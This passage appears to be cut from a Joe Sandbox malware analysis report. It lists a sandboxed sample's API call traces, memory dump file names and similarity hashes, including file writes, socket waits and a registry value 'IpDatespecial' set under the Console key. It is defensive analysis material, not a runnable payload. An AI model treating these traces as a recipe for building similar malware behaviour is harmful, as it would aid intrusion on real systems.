                                                                                                                                                                      • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02C638C4
                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02C63931
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C6395C
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02C639F4
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02C63A22
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02C63A39
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058130114-0
                                                                                                                                                                      • Opcode ID: f465474630c30891e437f65232dffdf5523e20e669d825d9d0f400f13687f7c1
                                                                                                                                                                      • Instruction ID: 5ede6ca77a58c8511b9bafdf88db4bc7284f93753e356e55281eaf7f5b59ad01
                                                                                                                                                                      • Opcode Fuzzy Hash: f465474630c30891e437f65232dffdf5523e20e669d825d9d0f400f13687f7c1
                                                                                                                                                                      • Instruction Fuzzy Hash: DC51BF70A007419BDB209F64C9C8BBAB7E5BF85B18F504959DD5ADB280EB31EA40CF91
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0377E815,?,?,?,?,74DF23A0,00000000), ref: 0377E6BD
                                                                                                                                                                      • CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0377E815,?,?,?,?,74DF23A0,00000000), ref: 0377E6D7
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0377E6F2
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000), ref: 0377E6FF
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 0377E70A
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377E711
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 0377E71E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4202892810-0
                                                                                                                                                                      • Opcode ID: e164b31dd228f1bf2178b5d9a3100e87ba4cd2175fd9de4eb0cf7900e9bf1595
                                                                                                                                                                      • Instruction ID: 296cd192ff3df01f744ff5db4d9a826bd16d423e1bd1f6b6cd7edb167053f27a
                                                                                                                                                                      • Opcode Fuzzy Hash: e164b31dd228f1bf2178b5d9a3100e87ba4cd2175fd9de4eb0cf7900e9bf1595
                                                                                                                                                                      • Instruction Fuzzy Hash: 7B012D71281208BBE214B764BC0FF9A366CD749721F108745F714E61C5C7B8581187A4
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03796318,00000008,03783E36,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C), ref: 03783D3F
                                                                                                                                                                      • __lock.LIBCMT ref: 03783D73
                                                                                                                                                                        • Part of subcall function 03788E5B: __mtinitlocknum.LIBCMT ref: 03788E71
                                                                                                                                                                        • Part of subcall function 03788E5B: __amsg_exit.LIBCMT ref: 03788E7D
                                                                                                                                                                        • Part of subcall function 03788E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03783F06,0000000D,03796340,00000008,03783FFF,00000000,?,037810F0,00000000,03796278,00000008,03781155,?), ref: 03788E85
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 03783D80
                                                                                                                                                                      • __lock.LIBCMT ref: 03783D94
                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 03783DB2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                                                      • Opcode ID: 5aae2047b7784a2c55cff49b84ed8b07f1b2f3329925a6f264637cd3310d1e0b
                                                                                                                                                                      • Instruction ID: 6d22edb9e1fb2280c7f986dd1aae3700977e01883f9835bc5297ddb911a26f91
                                                                                                                                                                      • Opcode Fuzzy Hash: 5aae2047b7784a2c55cff49b84ed8b07f1b2f3329925a6f264637cd3310d1e0b
                                                                                                                                                                      • Instruction Fuzzy Hash: AE018479480B01EFFB20FF69D809749FBE0AF44724F108A4ED596AB7A0CBB4A545CB15
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,02C77C00,00000008,02C698EA,00000000,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C), ref: 02C697F3
                                                                                                                                                                      • __lock.LIBCMT ref: 02C69827
                                                                                                                                                                        • Part of subcall function 02C6C144: __mtinitlocknum.LIBCMT ref: 02C6C15A
                                                                                                                                                                        • Part of subcall function 02C6C144: __amsg_exit.LIBCMT ref: 02C6C166
                                                                                                                                                                        • Part of subcall function 02C6C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,02C699BA,0000000D,02C77C28,00000008,02C69AB1,00000000,?,02C67711,00000000,02C77B60,00000008,02C67776,?), ref: 02C6C16E
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02C69834
                                                                                                                                                                      • __lock.LIBCMT ref: 02C69848
                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 02C69866
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                                                      • Opcode ID: 9ac01b06c9d5690d68d44f5207b3511c6dde6299e6f2518af84079dd06ff62f0
                                                                                                                                                                      • Instruction ID: 9ad7fd6743fef40443e74a4dfc67fc50ac3d8add0c9e42f91a4470d72b7a636a
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ac01b06c9d5690d68d44f5207b3511c6dde6299e6f2518af84079dd06ff62f0
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F01C0B1840B009FE320AF69C98C759FBF1AF54321F10890ED8DA97290CBB4A644DF11
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0377B7A7
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0377B7B7
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 0377B7CE
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000004), ref: 0377B7D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$CloseDeleteOpen
                                                                                                                                                                      • String ID: Console$IpDatespecial
                                                                                                                                                                      • API String ID: 3183427449-1840232981
                                                                                                                                                                      • Opcode ID: 285438ca7be8292d9dda37bbc5c68670987143911d4dbd5f8d307eb7f3649e03
                                                                                                                                                                      • Instruction ID: ea708eee807a62877f83689af6ecc8e320521b446e5d9ff9dab8b9844603d848
                                                                                                                                                                      • Opcode Fuzzy Hash: 285438ca7be8292d9dda37bbc5c68670987143911d4dbd5f8d307eb7f3649e03
                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF02771344348FFE325A764AC0FF1AB764F789710F008B4FF780651828264A001C755
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 0379031D
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __getptd.LIBCMT ref: 0379032E
                                                                                                                                                                      • __getptd.LIBCMT ref: 0379033C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                                                      • API String ID: 803148776-2671469338
                                                                                                                                                                      • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                      • Instruction ID: 47f21f1f0dd88a0a703a1df303f7e62a249c01377c37bac3dfda92075134647b
                                                                                                                                                                      • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                      • Instruction Fuzzy Hash: 20E01A3C560204CFEB20EB6CD08AB6836D9BF4CA14F5905A7D40CCF222C738E4908A83
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C73412
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C73423
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C73431
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                                                      • API String ID: 803148776-2671469338
                                                                                                                                                                      • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                      • Instruction ID: 5225a0c840c634e7907a89fb12d50d9a723bf948b54f46991bfdac8a03af220f
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                      • Instruction Fuzzy Hash: 34E01A305041888EC724AB68C08DB783BE5FBC8318F5A44F5E45DDB222C739EA50F946
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 03779C3F
                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      • _free.LIBCMT ref: 03779C63
                                                                                                                                                                      • _memset.LIBCMT ref: 03779CBB
                                                                                                                                                                        • Part of subcall function 0377A610: GetObjectW.GDI32(?,00000054,?), ref: 0377A62E
                                                                                                                                                                      • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03779CD3
                                                                                                                                                                      • _free.LIBCMT ref: 03779CE4
                                                                                                                                                                      • _free.LIBCMT ref: 03779D23
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1756752955-0
                                                                                                                                                                      • Opcode ID: c9b824b4f6f425528869821faf3fac010f304e4e9e2069a0b99fdeadb992eb45
                                                                                                                                                                      • Instruction ID: cfa9e7b64ca34f995fcabe88d5d8e92141579368c87c3fbc19f7597a1cdc4df5
                                                                                                                                                                      • Opcode Fuzzy Hash: c9b824b4f6f425528869821faf3fac010f304e4e9e2069a0b99fdeadb992eb45
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31A1B26013066BEB10DF3AD984B56B7E8BF4A314F04853ADA09CB650F7B1E454CBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF), ref: 037750CA
                                                                                                                                                                      • WSASetLastError.WS2_32(0000139F), ref: 037750E2
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 037750EC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                      • Opcode ID: 25bc45b261c2acb6f3d8ff722be6f51b8679b0991b1c7b479135f7982b8d8b91
                                                                                                                                                                      • Instruction ID: c1967892b2471ae2a0dfff31c3905607f5361353d025eccdfaf00a5cf1b3d5ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 25bc45b261c2acb6f3d8ff722be6f51b8679b0991b1c7b479135f7982b8d8b91
                                                                                                                                                                      • Instruction Fuzzy Hash: 8031B076604348ABDB14DF54D845B6AB3E8FB49721F008A5EE915C7680E73AA810CB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF), ref: 02C650AA
                                                                                                                                                                      • WSASetLastError.WS2_32(0000139F), ref: 02C650C2
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02C650CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                      • Opcode ID: a1e9ff6469bb4cf599bfd9999b61cfbe1484d4c872b1949bab025c54520b25c1
                                                                                                                                                                      • Instruction ID: 753567789646d87140935781ce98b2a18eb574711eb93022b9ef526636c73949
                                                                                                                                                                      • Opcode Fuzzy Hash: a1e9ff6469bb4cf599bfd9999b61cfbe1484d4c872b1949bab025c54520b25c1
                                                                                                                                                                      • Instruction Fuzzy Hash: 9331CB72A44644ABD720CF94EC89B6AB3E9FB48751F508A1AED06C7780D736E810CB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C648E1
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C648EC
                                                                                                                                                                      • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C648F9
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C64914
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C6491D
                                                                                                                                                                      • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C6492E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 640476663-0
                                                                                                                                                                      • Opcode ID: 6bcaede5f1886750debe952bbea589acb78c56c6fc0b0988769e3d1ae8be83e5
                                                                                                                                                                      • Instruction ID: eac536ef73d1c1c8866a309e30a484af165a67c75058a2096b70a4a5bec3a19a
                                                                                                                                                                      • Opcode Fuzzy Hash: 6bcaede5f1886750debe952bbea589acb78c56c6fc0b0988769e3d1ae8be83e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 33216A721442848BCB24EBA9DC88A97F3F9FF8A754B540B08E554C7385C6759805CFE0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 037905D6
                                                                                                                                                                        • Part of subcall function 037900B7: __getptd.LIBCMT ref: 037900C5
                                                                                                                                                                        • Part of subcall function 037900B7: __getptd.LIBCMT ref: 037900D3
                                                                                                                                                                      • __getptd.LIBCMT ref: 037905E0
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __getptd.LIBCMT ref: 037905EE
                                                                                                                                                                      • __getptd.LIBCMT ref: 037905FC
                                                                                                                                                                      • __getptd.LIBCMT ref: 03790607
                                                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 0379062D
                                                                                                                                                                        • Part of subcall function 0379015C: __CallSettingFrame@12.LIBCMT ref: 037901A8
                                                                                                                                                                        • Part of subcall function 037906D4: __getptd.LIBCMT ref: 037906E3
                                                                                                                                                                        • Part of subcall function 037906D4: __getptd.LIBCMT ref: 037906F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                                                      • Opcode ID: 9bd4502114ce8111bf9d454e7a8e4889f92212de9bfeab1b909444a702fd674f
                                                                                                                                                                      • Instruction ID: 5c61e3235416dec17f5b019835b32c51c6fafffd5120f168d91853f444075f7b
                                                                                                                                                                      • Opcode Fuzzy Hash: 9bd4502114ce8111bf9d454e7a8e4889f92212de9bfeab1b909444a702fd674f
                                                                                                                                                                      • Instruction Fuzzy Hash: FD11DAB9D51309DFEF10EFA4D448B9D77B0FF08710F10816AE825AB250DB7899559F50
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 0360FF95
                                                                                                                                                                        • Part of subcall function 0360FA76: __getptd.LIBCMT ref: 0360FA84
                                                                                                                                                                        • Part of subcall function 0360FA76: __getptd.LIBCMT ref: 0360FA92
                                                                                                                                                                      • __getptd.LIBCMT ref: 0360FF9F
                                                                                                                                                                        • Part of subcall function 0360381A: __getptd_noexit.LIBCMT ref: 0360381D
                                                                                                                                                                        • Part of subcall function 0360381A: __amsg_exit.LIBCMT ref: 0360382A
                                                                                                                                                                      • __getptd.LIBCMT ref: 0360FFAD
                                                                                                                                                                      • __getptd.LIBCMT ref: 0360FFBB
                                                                                                                                                                      • __getptd.LIBCMT ref: 0360FFC6
                                                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 0360FFEC
                                                                                                                                                                        • Part of subcall function 0360FB1B: __CallSettingFrame@12.LIBCMT ref: 0360FB67
                                                                                                                                                                        • Part of subcall function 03610093: __getptd.LIBCMT ref: 036100A2
                                                                                                                                                                        • Part of subcall function 03610093: __getptd.LIBCMT ref: 036100B0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                                                      • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                      • Instruction ID: ba09f7a248fc97c2998ccab73c5e7881e07bd7fab72a292e5ed9c188f19e960e
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                      • Instruction Fuzzy Hash: A011C979D01309DFDF04EFA4D845AAE7BB5FF04311F1084A9E814AB390DB3899559F54
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 02C736CB
                                                                                                                                                                        • Part of subcall function 02C7325B: __getptd.LIBCMT ref: 02C73269
                                                                                                                                                                        • Part of subcall function 02C7325B: __getptd.LIBCMT ref: 02C73277
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C736D5
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C736E3
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C736F1
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C736FC
                                                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 02C73722
                                                                                                                                                                        • Part of subcall function 02C73300: __CallSettingFrame@12.LIBCMT ref: 02C7334C
                                                                                                                                                                        • Part of subcall function 02C737C9: __getptd.LIBCMT ref: 02C737D8
                                                                                                                                                                        • Part of subcall function 02C737C9: __getptd.LIBCMT ref: 02C737E6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                                                      • Opcode ID: c11137feeac243ddddcf5d0cd71b4ab0059f2c3ba62eeb55c2b7bd41880d4e8e
                                                                                                                                                                      • Instruction ID: 1c0c6671c9ac45b103591b610980bfa617c447502645336d45b33e0eca07b541
